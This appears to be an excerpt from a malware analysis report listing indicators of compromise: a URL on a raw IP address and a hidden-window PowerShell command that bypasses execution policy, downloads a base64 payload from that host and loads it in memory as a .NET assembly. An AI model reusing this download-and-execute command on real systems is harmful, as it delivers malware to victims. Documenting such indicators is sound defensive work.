Technical Information
- http://31.184.234.138/grbr.dat
- '31.##4.234.138':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoExit -Exec Bypass -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('http://31.184.234.138/grbr.dat'))).EntryPoi...' (with hidden window)